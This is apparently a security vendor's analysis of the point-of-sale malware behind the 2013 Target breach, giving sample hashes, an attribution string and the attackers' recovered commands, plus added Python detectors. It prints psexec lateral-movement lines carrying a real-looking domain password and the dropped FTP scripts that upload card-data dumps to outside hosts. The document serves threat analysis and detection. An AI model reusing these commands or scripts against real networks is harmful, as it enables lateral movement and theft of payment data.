In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records of payment, transaction, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.
Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.
Sample Information/Sources
- ce0296e2d77ec3bb112e270fc260f274 – ThreatExpert (cache)
- F45F8DF2F476910EE8502851F84D1A6E – ThreatExpert (cache)
- 7f1e4548790e7d93611769439a8b39f2 – VirusTotal
- 4d445b11f9cc3334a4925a7ae5ebb2b7 – VirusTotal
- 762ddb31c0a10a54f38c82efa0d0a014 – VirusTotal
- c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – VirusTotal
7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.
Possible Actor/Attribution Data
Both uploaders contain the following string (a compile path):
- z:\Projects\Rescator\uploader\Debug\scheck.pdb
Rescator is a known actor in various cybercrime forums.
Data Collection and Transfer
Data is collected and transferred to internal shares via the following command syntax:
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r cmd /c "taskkill /im bladelogic.exe /f"
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r -d bladelogic
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\10.116.240.31\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
- c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt
“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.
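The command lines above give a defender four concrete things to hunt for in process-creation telemetry: psexec launched with /accepteula against an internal host, a domain user and password passed on the command line, taskkill aimed at a management agent (bladelogic.exe here), a move from a UNC share into a local temp directory under a data_YYYY_M_D_H_M.txt name, and ftp driven by a -s: script. The script below is an added example, not McAfee Labs code or anything recovered from the samples; it assumes records in the same "<image>, <command line>" layout used in the listing above, the sample records are constructed for the demonstration (the password is replaced with a placeholder), and the set of watched agent names is an assumption that a real deployment would populate from its own inventory.

```python
import re

# Regexes derived from the command syntax quoted above. They are a triage heuristic, not a full signature set.
PSEXEC_RE = re.compile(r"\bpsexec(?:\.exe)?\b.*?/accepteula\s+\\\\(?P<host>[\w.\-]+)", re.I)
CREDS_RE = re.compile(r"\s-u\s+(?P<user>\S+)\s+-p\s+\S+", re.I)
TASKKILL_RE = re.compile(r"\btaskkill\b.*?/im\s+(?P<proc>[\w.\-]+)", re.I)
MOVE_RE = re.compile(r"\bmove\s+\\\\(?P<host>[\w.\-]+)\\(?P<src>\S+)\s+(?P<dst>.+?\.txt)\b", re.I)
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\s+-s:(?P<script>.+)", re.I)
# Staged-dump naming seen in the move command: data_<year>_<month>_<day>_<hour>_<minute>.txt
DUMP_NAME_RE = re.compile(r"data_\d{4}(?:_\d{1,2}){4}\.txt", re.I)

# Assumed list of management/security agents whose termination should raise an alert;
# bladelogic.exe is the one named in the command lines above.
WATCHED_AGENTS = {"bladelogic.exe"}


def parse_record(line):
    """Split an '<image>, <command line>' record into its two fields."""
    image, _, cmdline = line.partition(", ")
    return image.strip().lower(), cmdline.strip()


def classify(cmdline):
    """Return the detection tags that fire for a single command line (empty list if none)."""
    tags = []
    m = PSEXEC_RE.search(cmdline)
    if m:
        tags.append(f"psexec_remote_exec:{m.group('host')}")
        if CREDS_RE.search(cmdline):
            tags.append("cleartext_creds_on_cmdline")
    m = TASKKILL_RE.search(cmdline)
    if m and m.group("proc").lower() in WATCHED_AGENTS:
        tags.append(f"agent_kill:{m.group('proc').lower()}")
    m = MOVE_RE.search(cmdline)
    if m:
        tags.append(f"unc_to_local_move:{m.group('host')}")
        if DUMP_NAME_RE.search(m.group("dst")):
            tags.append("staged_dump_filename")
    if FTP_SCRIPT_RE.search(cmdline):
        tags.append("scripted_ftp")
    return tags


def scan(lines):
    """Run classify() over a list of records and return (image, tags) for the ones that fired."""
    hits = []
    for line in lines:
        image, cmdline = parse_record(line)
        tags = classify(cmdline)
        if tags:
            hits.append((image, tags))
    return hits


# Constructed sample records in the same layout as the listing above; the password is a placeholder.
SAMPLE_LOG = [
    r'c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p [REDACTED] cmd /c "taskkill /im bladelogic.exe /f"',
    r"c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p [REDACTED] -d bladelogic",
    r"c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\10.116.240.31\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt",
    r"c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt",
    r"c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c dir c:\temp",   # benign control record
]

if __name__ == "__main__":
    for image, tags in scan(SAMPLE_LOG):
        print(image, "->", ", ".join(tags))
```

Each tag is independent, so a single psexec line that both carries credentials and kills an agent produces three tags; correlating several of them from one host within a short window is a much stronger signal than any one on its own.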
7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:
——————————————
open xxx.xxx.xxx.xx
%name%
%password%
cd public_html
cd cgi-bin
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt
quit
——————————————
Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.
——————————————
open xx.xxx.xxx.xx
%name%
%password%
cd 001
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————
——————————————
open xx.xx.xxx.xx
%name%
%password%
cd etc
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————
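The three dropped scripts share one shape: they are Windows ftp -s: command files in which the two lines after open are consumed as the username and password prompts, cd lines build the remote directory, bin switches to binary mode, and send uploads the staged dump. The parser below is an added example, not code from McAfee Labs or from the samples; it turns such a script into the indicators an analyst pivots on (host, remote path, uploaded file names, whether credentials are literal or %name%-style tokens) and recognises the x-masked addresses used in this write-up. The first input is the script quoted above; the second is constructed for the demonstration and uses the documentation address 192.0.2.10.

```python
import re
from dataclasses import dataclass, field

IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
TOKEN_RE = re.compile(r"^%\w+%$")      # %name% / %password% style placeholders


@dataclass
class FtpScript:
    host: str = ""
    host_redacted: bool = False         # True when the address was masked with x's in the write-up
    user: str = ""
    password: str = ""
    remote_dirs: list = field(default_factory=list)
    binary: bool = False
    uploads: list = field(default_factory=list)
    quits: bool = False
    unknown: list = field(default_factory=list)


def parse_ftp_script(text):
    """Parse a Windows 'ftp -s:<file>' command script into its transfer-relevant fields.

    ftp.exe answers its own prompts from the script in order, so the two lines that
    follow 'open <host>' are taken as the username and password responses.
    """
    s = FtpScript()
    login_fields = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or set(line) <= set("-—"):   # skip blank lines and separator rules
            continue
        if login_fields:                          # username first, then password
            setattr(s, login_fields.pop(0), line)
            continue
        verb, _, arg = line.partition(" ")
        verb, arg = verb.lower(), arg.strip()
        if verb == "open":
            s.host = arg
            s.host_redacted = bool(IPV4_RE.match(arg) is None and re.fullmatch(r"[x.]+", arg, re.I))
            login_fields = ["user", "password"]
        elif verb == "cd":
            s.remote_dirs.append(arg)
        elif verb in ("bin", "binary"):
            s.binary = True
        elif verb in ("send", "put"):
            s.uploads.append(arg)
        elif verb in ("quit", "bye"):
            s.quits = True
        else:
            s.unknown.append(line)
    return s


def summarize(s):
    """Reduce a parsed script to the indicators worth recording."""
    return {
        "host": s.host,
        "host_redacted": s.host_redacted,
        "remote_path": "/".join(s.remote_dirs),
        "files": list(s.uploads),
        "file_has_runtime_pattern": any("%" in f for f in s.uploads),
        "credentials_literal": not (TOKEN_RE.match(s.user) or TOKEN_RE.match(s.password)),
        "binary_mode": s.binary,
        "complete_session": bool(s.host) and bool(s.uploads) and s.quits,
    }


# Script quoted in the write-up above (addresses masked there with x's).
SCRIPT_FROM_WRITEUP = r"""
open xxx.xxx.xxx.xx
%name%
%password%
cd public_html
cd cgi-bin
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt
quit
"""

# Constructed script with literal (made-up) credentials and a documentation address.
CONSTRUCTED_SCRIPT = r"""
open 192.0.2.10
dropuser
dropp4ss
cd 001
bin
send C:\Temp\data_2014_1_16_15_30.txt
quit
"""

if __name__ == "__main__":
    for text in (SCRIPT_FROM_WRITEUP, CONSTRUCTED_SCRIPT):
        print(summarize(parse_ftp_script(text)))
```

The credentials_literal flag separates a script that embeds real logon data from one that still carries %name%/%password% tokens, and file_has_runtime_pattern marks the %_%_%%_%% date fields that are filled in when the dump is written; both distinctions matter when deciding which values are actual indicators and which are template text.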
Compilation Dates
- 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
- 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
- c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec 3 00:15:01 2013 UTC
- 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC